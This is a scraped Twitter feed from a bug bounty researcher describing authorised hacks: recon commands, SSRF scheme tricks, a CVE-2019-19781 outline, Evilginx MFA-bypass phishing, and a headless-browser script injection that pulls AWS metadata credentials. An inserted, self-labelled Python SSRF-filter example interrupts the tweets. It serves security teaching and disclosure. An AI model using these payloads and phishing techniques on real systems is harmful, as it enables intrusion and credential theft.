Corben Leo

@hacker_

Followers
68,531
Following
672
Media
280
Statuses
4,158

I hack stuff (legally) | Jesus follower | Co-founder @boringmattress

Brookings, South Dakota
Joined February 2016
Pinned Tweet
@hacker_
Corben Leo
2 years
In 2010, WikiLeaks released a classified document. A list of infrastructure critical to U.S. national security. The government listed a Trans-Atlantic cable. 3 years ago, 19-year-old me gained ADMIN access to that cable (and another; shared codebase). 🧵Here's how I found it
@hacker_
Corben Leo
2 years
I hacked a gaming company this year. Here's how I did it:
@hacker_
Corben Leo
2 years
Uber was hacked. The hacker social engineered an employee -> logged into the VPN and scanned their intranet. 👇
@hacker_
Corben Leo
2 years
I'm uncomfortable tweeting stuff like this out, but... I found a critical vulnerability in @opensea this weekend and reported it through @Hacker0x01 . They fixed the issue within 3 hours of reporting and I just got this notification👏🫢
@hacker_
Corben Leo
1 year
I hacked a phone company earlier last year. I found a stupidly simple way to view the call logs of 50M customers. Here's how I did it:
@hacker_
Corben Leo
9 months
I've made $500k+ from SSRF vulnerabilities. Here are my tricks:
@hacker_
Corben Leo
1 year
I hacked a large company (70k+ employees) through social engineering. Legally of course. • I set up the infrastructure • Scraped names & emails with LinkedIn • Sent 200 phishing emails. I had access to their AWS console within 2 minutes. And much more:
@hacker_
Corben Leo
1 year
I hacked a car company last year. I found a way to steal every customer's • Name • Email address • Phone number • Address Here's how I did it:
@hacker_
Corben Leo
2 years
Hacking CAN be easy. But, often it's not. Let's develop your technical skills, they obviously matter. A roadmap:
@hacker_
Corben Leo
9 months
I hacked a car company. Here's how I gained access to hundreds of their codebases.
@hacker_
Corben Leo
1 year
I've spent the last 8 years hacking companies (legally). Now, I'm starting a mattress company. I'm taking on a $16B industry to solve a huge problem. Here's why:
@hacker_
Corben Leo
2 years
How you can learn to hack web3 (and protect millions of dollars):
@hacker_
Corben Leo
2 years
Apparently there was an internal network share that contained powershell scripts... "One of the powershell scripts contained the username and password for an admin user in Thycotic (PAM). Using this I was able to extract secrets for all services, DA, DUO, Onelogin, AWS, GSuite"
@hacker_
Corben Leo
1 year
My favorite hacking stories of 2022:
@hacker_
Corben Leo
2 years
Anyone can hack. Yes, anyone. You can hack. Big companies. With little to no technical skills. And make thousands of dollars. Legally. It requires some common sense & a web browser. Note: DON'T do this to websites unless you have permission! It's illegal. Here's how:
@hacker_
Corben Leo
1 year
I hacked the military. A system containing the information of military personnel. Yet, the hack was done legally. Here's how I did it and how it was done legally:
@hacker_
Corben Leo
2 years
@opensea @Hacker0x01 I'm not trying to brag, I never share bounty amounts – but I'm literally shaking right now and wanted to share my amazement. I'm super duper lucky and blessed to have found this 🙏
@hacker_
Corben Leo
2 years
Who's your phone provider? Well, there's a good chance that I've hacked them! Last year, I breached a major telecom company (many times...) This time, I stole the data of every employee. (well, I didn't steal all of it, but I could've)... Here's how I did it:
@hacker_
Corben Leo
2 years
302 Military FTP servers. Imagine you had access to 302 military FTP servers. What data could possibly be on them? Who would get hurt by that data? Who would it benefit? 5 years ago, a 17-year-old gained access to 300 military FTP servers. Here's how I did it:
@hacker_
Corben Leo
1 year
A $1,000,000 bounty? How @kucoincom leaked user information via a simple vulnerability And why you shouldn't hack on @HackenProof .
@hacker_
Corben Leo
3 months
You can find easy critical vulnerabilities. It just takes finding unique attack surfaces. Here's an example of how you can, using a story of how I hacked a car company:
@hacker_
Corben Leo
2 years
Lessons: - Context is King. THINK! - To break you must first understand: Know your target's technologies & the services they use. - Learn to code. Top:
@hacker_
Corben Leo
2 years
I hacked a gaming company this year. Here's how I did it:
@hacker_
Corben Leo
2 years
Are you into web hacking? If so, you must have technology-specific wordlists If not, you're missing obvious vulnerabilities. Don't believe me? Let's look at an information disclosure in an ASP[.]NET Core site:
@hacker_
Corben Leo
2 years
Authorization. Easy to understand. Critical if implemented incorrectly. Want to see an example? (dumb question Corben, yes, why not) Last month, I found an auth bypass that led to a full account takeover. Here's how I found it:
@hacker_
Corben Leo
2 years
See a host that's redirecting to single sign-on? Don't skip it. Do Content-Discovery. Use gau. Then ffuf. You will be surprised at the misconfigurations you'll find. And the things you can access (that you shouldn't be able to).
@hacker_
Corben Leo
2 years
It's easy to find attack surfaces that others haven't. You just need to think creatively. "But Corben, I don't know how!" That's what I'm here for. I'll share some simple methodology that works. (so you can find vulnerabilities...and make money) A story:
@hacker_
Corben Leo
1 year
7/ I'm still blown away that such simple, stupid vulnerabilities exist.
@hacker_
Corben Leo
1 year
I hacked a phone company earlier last year. I found a stupidly simple way to view the call logs of 50M customers. Here's how I did it:
@hacker_
Corben Leo
1 year
Well, she said yes ❤️ It was hard to hide a puppy from her too, but totally worth it.
@hacker_
Corben Leo
2 years
TLDR;
- Participating in a bug bounty program (telecommunications company)
- Scanned their IPV4 Ranges
- Found a webserver that said "███ Cable System"
- Directory brute-force found /admin/accounts/
- The endpoint set a valid admin JSESSIONID.
@hacker_
Corben Leo
2 years
In 2010, WikiLeaks released a classified document. A list of infrastructure critical to U.S national security. The government listed a Trans-Atlantic cable. 3 years ago, 19-year-old me gained ADMIN access to that cable (and another; shared codebase). 🧵Here's how I found it
@hacker_
Corben Leo
1 year
5/ I tried again, with another person's ID: It actually worked. 🤦🏻‍♂️ An incredibly stupid, simple vulnerability affecting 50M+ customers. Insane
@hacker_
Corben Leo
2 years
What happens when you combine hackers and phones? Phreaking? Social Engineering? Sure! Valid answers. What you didn't think of is web vulnerabilities. XXE. I found an XXE by phone call in a bug bounty program. Here's the story:
@hacker_
Corben Leo
2 years
10/ I reported it immediately and started pinging their program manager. It was the best response I've ever gotten. And will ever get.
@hacker_
Corben Leo
2 years
1/ The scope of this program was *.███.com
With a wildcard, basic recon is: Subdomain Enumeration + HTTP server probing:
$ subfinder -d example[dot]com | httpx -o example.httpx
@hacker_
Corben Leo
2 years
🚨 429 Too Many Requests. You've been here before. Getting rate-limited is THEE. WORST. Thankfully, you can easily bypass it. In most cases. FireProx (by @ustayready ) lets you use a different IP for every request (using AWS). It's simple to use too:
@hacker_
Corben Leo
9 months
Finding vulnerabilities got easier. Pair @WeaselJs + Cursor by @anysphere . Javascript analysis will never be the same
@hacker_
Corben Leo
1 year
6/ I eventually found 5 other similar issues that leaked: • Customer names, phone numbers • Payment details (cards, amounts, dates of payments) • Etc. I reported them all to their bug bounty program and they duplicated them into one report and eventually fixed the issues.
@hacker_
Corben Leo
2 months
Attack surface is larger than you’d expect. Most companies have domain names that they use internally (for development, QA, etc). Ex, PayPal uses “” Here's how you can find network misconfigurations and find “internal assets” on the public internet:
@hacker_
Corben Leo
2 years
The simplest observations can lead to finding huge vulnerabilities. Here's how @Shlibness & I gained access to data of 25,233 employees:
@hacker_
Corben Leo
9 months
ratio
@Rhynorater
Justin Gardner
10 months
I've made over 100k on SSRF vulnerabilities. They aren't always as simple as pointing it at localhost or AWS Metadata service. Here are some tricks I've picked up over the past 5 years of web app testing:
@hacker_
Corben Leo
2 months
Directory-brute forcing? You should NEVER filter based on status code. Paths can exist and return a 404. I’ve seen this so many times: /noexist/ -> 404 Not Found. /api/ -> 404 Not Found, but different response body (JSON formatted) /api/endpoint -> 200 OK Filter by
@hacker_
Corben Leo
5 years
New blog post: Analysis of an Atlassian Crowd RCE - CVE-2019-11580
@hacker_
Corben Leo
6 years
It's finally out!!! New blog post: Advanced CORS Exploitation Techniques:
@hacker_
Corben Leo
3 years
Most companies have domain names that they use internally (for development, QA, etc). For example, PayPal uses "". I've seen so many network misconfigurations and you can find these juicy internal hosts on the public internet. 1/🧵
@hacker_
Corben Leo
2 years
✋Traditional file & directory brute-forcing can only get you so far. 👉 Here’s an easy way to generate target-based wordlists with gau and @tomnomnom ’s unfurl:
@hacker_
Corben Leo
2 months
You're using Burp Collaborator wrong. Don't use Burp's default collaborator instance when testing for out of band vulnerabilities. Many companies use egress filtering & block outbound traffic to the default collaborator domain It's worth setting up a
@hacker_
Corben Leo
4 years
got a new toy, thanks @Hacker0x01 !
@hacker_
Corben Leo
4 years
I just rewrote and now released subjs v1.0.0 (). Javascript files can contain an abundance of valuable information when hacking – from undocumented API endpoints to secrets – if you aren't digging through them, you need to! #bugbountytips
@hacker_
Corben Leo
1 year
1/ I used Evilginx2 to bypass MFA (Okta & Duo) From Okta, I could access Outlook, Sharepoint, Github, & many more services on behalf of the 50+ employees that fell for the phish. I was blown away by how easy it was to pull off this "hack" that could've impacted 60M+ people.
@hacker_
Corben Leo
2 months
You're probably directory brute-forcing wrong. You should be methodical when targeting frameworks such as Express, Rails, Flask, Django, etc. 2/ By default, ffuf uses the GET HTTP method. You should be fuzzing with different HTTP methods. Try using a wordlist multiple times
@hacker_
Corben Leo
1 year
3/ After spidering the site with Burp, I eventually came across an old Javascript file. This javascript contained a reference to a JSP file with a name that indicated similar functionality: "/myaccount/modals/view_call_log_details_modal.jsp"
@hacker_
Corben Leo
3 months
How anyone could've accessed vulnerability reports sent to a $40B+ company:
@hacker_
Corben Leo
1 year
1/ I've been in this bug bounty program for quite some time. I previously bought a phone plan so I could login and test functionality as an authenticated user. In the dashboard, there was a tab to view your call logs.
@hacker_
Corben Leo
1 year
The DoD experienced its largest leak in 10 years. Jack Teixeira shared highly classified military documents on Discord. He was arrested. 3 years ago, a 20-year-old kid found a vulnerability that leaked confidential aircraft & missile information. Here's how I did it:
@hacker_
Corben Leo
5 years
getallurls - fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl: Quick script that I use religiously for content discovery.
@hacker_
Corben Leo
4 years
This is why I love open source
@hacker_
Corben Leo
1 year
Oof. The gal sitting next to me on the plane works for a pretty big company. She’s got a spreadsheet open on her computer… And it’s got passwords lol Company2021@
@hacker_
Corben Leo
2 years
@kvanh @ErrataRob I got paid $0 because “all of these other companies own it too so we’re not the only ones at fault”
@hacker_
Corben Leo
1 year
2/ The URL contained a parameter called "subscriberId". It contained a numerical ID, so obviously I tried to change it to another user's. Unfortunately, it didn't work.
@hacker_
Corben Leo
3 months
Understanding how systems work is a competitive advantage as a hacker. How do you get to this point? Build. Code a complex, modern application that relies on: -> a database -> caching/memory-store (redis) -> message broker (rabbitmq) etc. Deploy it. #typefully
@hacker_
Corben Leo
3 years
them: "bug bounty is a scam" their reports:
@hacker_
Corben Leo
9 months
1. Try other URL schemes: • file:// (file read) • netdoc:// (file read) • dict:// • gopher:// • jar:// • ldap:// • and more! You might be able to get file read. Or send multi-line requests to gain additional impact (Ex: gopher + redis = likely RCE)
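The mitigation side of the scheme list above, as an added example (not the author's code): a server-side fetcher check that allow-lists http/https, rejects the listed schemes, and refuses destinations in private, loopback or link-local ranges, including the metadata address 169.254.169.254 mentioned later in the feed, in its IPv4-mapped IPv6 form too. The hostnames in FAKE_DNS are hypothetical and the answer table is constructed so the check runs offline.

```python
"""Server-side fetch URL check: allow-list the scheme, block internal destinations.
Added example, not code from the thread above. It rejects the alternate schemes the
post lists (file://, netdoc://, dict://, gopher://, jar://, ldap://) and any target in
a private, loopback or link-local range, including the metadata address
169.254.169.254. FAKE_DNS is a constructed answer table so the check runs offline."""
import ipaddress
import socket
from typing import Callable, Iterable, List, Tuple
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
# Ranges a server-side fetcher must never reach on a user's behalf.
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "127.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "169.254.0.0/16",  # link-local; 169.254.169.254 is the cloud metadata service
    "::1/128", "fc00::/7", "fe80::/10",
)]
# Constructed DNS answers for the offline demo (hostnames are hypothetical).
FAKE_DNS = {
    "app.example.com": ["203.0.113.10"],
    "rebind.example.com": ["203.0.113.10", "10.0.0.5"],  # one public, one private
    "meta.example.com": ["::ffff:169.254.169.254"],      # IPv4-mapped metadata IP
}

def fake_resolver(host: str) -> List[str]:
    """Offline stand-in for DNS; raises like a real resolver on unknown names."""
    if host not in FAKE_DNS:
        raise OSError(f"NXDOMAIN {host}")
    return FAKE_DNS[host]

def live_resolver(host: str) -> List[str]:
    """Every A/AAAA answer for host from the system resolver."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})

def is_blocked_address(addr: str) -> bool:
    """True if addr (or the IPv4 it maps to) lies in a blocked range."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return True  # unparseable: refuse rather than guess
    # ::ffff:169.254.169.254 reaches the same host as 169.254.169.254
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return any(ip in net for net in BLOCKED_NETWORKS)

def check_fetch_url(url: str, resolver: Callable[[str], Iterable[str]] = live_resolver
                    ) -> Tuple[bool, str]:
    """Return (allowed, reason). Every resolved address must pass, not just the first."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme not allowed: {parts.scheme or '<none>'}"
    host = parts.hostname
    if not host:
        return False, "missing host"
    if parts.username is not None or parts.password is not None:
        return False, "credentials in URL not allowed"
    try:
        ipaddress.ip_address(host)
        targets = [host]  # literal IP, nothing to resolve
    except ValueError:
        try:
            targets = list(resolver(host))
        except OSError as exc:
            return False, f"cannot resolve {host}: {exc}"
    if not targets:
        return False, f"no addresses for {host}"
    for addr in targets:
        if is_blocked_address(addr):
            return False, f"{addr} is in a blocked range"
    # Caller should connect to the validated address (pin it), not re-resolve the
    # name, or a DNS rebinding answer can swap in a private IP after this check.
    return True, "ok"
```

With the default `live_resolver` the same function runs against real DNS; the pinning comment at the end is the part most implementations forget.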
@hacker_
Corben Leo
8 months
spent a few days trying to hack voting machines with some great researchers. great collaboration between vendors & researchers to secure democracy 🇺🇸
@hacker_
Corben Leo
1 year
4/ So, I visited the endpoint: The page loaded, and in the response I saw my call logs: Hm. What happens if I try to change the subscriberId to someone else's here?
@hacker_
Corben Leo
3 years
Super excited to announce that I've joined @assetnote as a software engineer! Stoked to work with great people like @infosec_au and on an amazing product 🎉
@hacker_
Corben Leo
2 years
2/ I searched the company's name on bgp.he.net. Saved their IP ranges. I ran @ErrataRob 's masscan, probed for HTTP(s) servers, and grabbed the HTTP titles. Looked something like:
$ masscan -p 80,443 -iL ranges -oL out.txt
$ cat out.txt | httpx -title
One title stuck out:
@hacker_
Corben Leo
2 years
Deleted the last Tweet for personal safety reasons. But I highly recommend hunting on @opensea 's bug bounty program :)
@hacker_
Corben Leo
1 year
1. I started with reconnaissance:
- Subdomain enumeration to find the company's subdomains.
- HTTP server probing to see what's online
$ subfinder -d example[dot]com | httpx -o target.httpx
I came across a webserver running IIS: hxxps://installersupport.██████.com/
@hacker_
Corben Leo
4 years
A CVE-2019-19781 is this easy – 1. Traversal to vpns folder, traversal in the NSC_HEADER + to write a malicious bookmark to the /netscaler/portal/templates/ folder (1st HTTP request), 2. Passing that template through the Template Toolkit (2nd request)
@hacker_
Corben Leo
3 years
I've re-written gau! This includes speed improvements, a new provider (urlscan), loading options from configuration files, new filter support, socks5 proxy support, and more! Make sure to grab the new version!
@hacker_
Corben Leo
2 years
8/ Redirected to the home page. Second visit:
> HTTP/1.1 200 OK
> --- snip ---
> <title>Account Administration</title>
HOLY **** IT WORKED. This is a HIGHLY redacted version of what I saw: So,
@hacker_
Corben Leo
2 years
Internal assets = sensitive. Apps meant for internal usage usually have weaker security than external-facing ones. Sometimes, internal assets aren't so internal. Here's how you can find such misconfigurations:
@hacker_
Corben Leo
2 years
1/ It began with a bug bounty program. Of a telecommunications company (that I can't name publicly). As some of you may know, I love recon. I had already done subdomain enumeration. The next step was to scan their IP ranges. So,
@hacker_
Corben Leo
2 years
*allegedly hacked
@hacker_
Corben Leo
2 years
14/ I verified they worked:
$ export AWS_ACCESS_KEY_ID=
$ export AWS_SECRET_ACCESS_KEY=
$ export AWS_SESSION_TOKEN=
$ aws sts get-caller-identity
The keys worked. And Scout2 proved I had access to too much :)
@hacker_
Corben Leo
2 years
4/ Look at the code in this picture. Routes are defined explicitly. In this example: You must GET /one to get a response. You must POST /two to get a valid response. Brute-force with API routes and dictionary words. (PS: @assetnote wrote about Contextual Content Discovery)
@hacker_
Corben Leo
2 years
@samwcyo
Sam Curry
2 years
Someone hacked an Uber employee's HackerOne account and is commenting on all of the tickets. They likely have access to all of the Uber HackerOne reports.
@hacker_
Corben Leo
2 years
9/ I clicked through the menus to see if I was actually authenticated. I was. FULLY. AUTHENTICATED. On that same IP range, They had ANOTHER system for ANOTHER cable. I tried the same attack. IT WORKED! I had admin access to TWO. Different. Cables. I was in disbelief. So,
@hacker_
Corben Leo
2 years
2/ HTTPX gave me 300 web-servers to target. One stuck out to me: hxxps://rendering-prd.redacted[.]com "rendering" stuck out to me. Why? Render means to "process information". Often to another format. With web apps, it's typically HTML to another format.
@hacker_
Corben Leo
2 years
Note: this is all alleged. I found the Telegram in this email that the hacker sent out via an Uber employee's HackerOne account (via policy update). I’ve obviously got nothing to do with it and have not reproduced or confirmed any of this.
@hacker_
Corben Leo
2 years
@vxunderground
vx-underground
2 years
Update: A Threat Actor claims to have completely compromised Uber - they have posted screenshots of their AWS instance, HackerOne administration panel, and more. They are openly taunting and mocking @Uber .
@hacker_
Corben Leo
2 years
1/ Become a dev (to break you must understand): • Read "Mastering Ethereum" (It's on GitHub) • Learn Solidity: • CryptoZombies • solidity-by-example[.]org • Solidity Docs • Learn how to use HardHat • Familiarize yourself with widely used contracts (EIP 20)
@hacker_
Corben Leo
5 years
Announcing the public release of my tool secretz! Written during our research of TravisCI, secretz is a tool that minimizes the large attack surface of Travis CI. It automatically fetches repos, builds, and logs for any given organization. Check it out:
@hacker_
Corben Leo
2 years
5/ The directory /admin/ Remember, it's running Apache Tomcat. I built a wordlist for .jsp files using BigQuery. (Learned from @assetnote 's commonspeak) Bruteforcing found a few JSP files, but they all redirected to the login page. Gah. Well,
@hacker_
Corben Leo
2 years
Yay, @opensea awarded me with a 3rd bounty on @Hacker0x01 ! #TogetherWeHitHarder
@hacker_
Corben Leo
3 months
Companies run software they don't write. Ex: Jira, GoAnywhere, etc. Finding vulns in these types of software = lots of vuln targets = $$$ So, do code review! Need the source? Find the software AWS's AMI Catalog. Launch a server. SSH in. Pull it. Review it #typefully day 4
@hacker_
Corben Leo
2 years
5/ You also must brute-force with different HTTP methods. I love @joohoi 's FFUF for directory/endpoint brute-forcing. By default, ffuf uses the GET method. So, I started with that and filtered by the number of response words (6) on the 404 page:
@hacker_
Corben Leo
2 years
2/ Learn networking. @three_cube has some amazing FREE resources on his website. Google "Network Basics for Hackers" and go through all of the posts. Here, learn TCP/IP basics, Subnetting, Network Masks, DNS, HTTP, etc. BORING? Maybe. But this knowledge is invaluable.
@hacker_
Corben Leo
4 years
Here's a short post from ~3 years ago if you want to see a quick proof-of-concept. #BugBountyTips #infosec
@Yumi_Sec
Yumi
4 years
If a web application allows you to upload a .zip file, zip:// is an interesting PHP wrapper to turn an LFI into an RCE. #BugBounty #BugBountyTips #InfoSec
@hacker_
Corben Leo
2 years
1/ - Learn Bash scripting & the command line - Learn HTML & Javascript (Codecademy / W3 Schools) - Learn Python (or Golang, Java, C#, or whatever). - Learn some basic SQL.
@hacker_
Corben Leo
1 year
2/ Phishing attacks are on the rise and are becoming more sophisticated. Last year we saw Uber, Dropbox, Twilio, Axie Infinity ($625M theft), and more compromised through phishing. People argue that humans are the "weakest link", yet, companies of all sizes still rely on:
@hacker_
Corben Leo
4 years
Today I got my bank account closed because apparently, I make too much money and there's no way that I'm actually a student. Thanks, @TCFBank !
@hacker_
Corben Leo
2 years
10/ Success. I got a request to /test.js with the User-Agent: Chrome/75.x.xx Running "whois" on the requesting IP address showed it was from AWS. AWS has a meta-data server at 169.254.169.254. It can be used to generate temporary access keys. To an AWS environment.
@hacker_
Corben Leo
1 year
12. I wanted to verify that this data was fresh. So, In the mobile app, I created another account. I targeted the new account and it worked!! I reported it to the company's bug bounty program on @Hacker0x01 They fixed it and I was eventually rewarded for it!
@hacker_
Corben Leo
2 years
4/ "login.jsp" Ok! It was a Tomcat webserver I didn't have credentials. Obviously. I started with directory brute-forcing. Used @joohoi 's ffuf & filtered by the number of response words on the 404 page. It found several directories. One that stuck out was
@hacker_
Corben Leo
2 years
Information is key. What sort of information could be in an Airforce Database? Who would get hurt by that data? Who would it benefit? 5 years ago, 17-year-old me easily gained access to an Air Force database. Legally, through Here's how I did it:
@hacker_
Corben Leo
1 year
3/ Forcing the consumption of cartoon training videos twice a year & hoping their SEG works. While some organizations are moving towards FIDO2, many aren't & can't. Companies aren't effectively equipping their employees to recognize & avoid the latest real-world threats.
@hacker_
Corben Leo
2 years
Do you have any "Oh Sh*t" moments? Here's one of mine from a year or two ago. The time I took down an API. A production API. Of an advertising company...On a Saturday...(and it stayed down for hours...) Here's what happened:
@hacker_
Corben Leo
2 years
12/ Headless browsers don't care. So, I tried this javascript:
POST /render HTTP/1.1
markup=<script src="hxxps://myserver/pwn.js"></script>
The server responded: 200 OK. Checked Burp Collaborator and it worked! My server had a request to "/main-production-worker-iam-role" So
@hacker_
Corben Leo
2 months
Finding vulnerabilities first = you get paid. Want to be the first to hack on new functionality? Monitor your target’s JS files for new paths or parameters. (automate with a headless browser to grab all dynamically loaded JS) #typefully day 9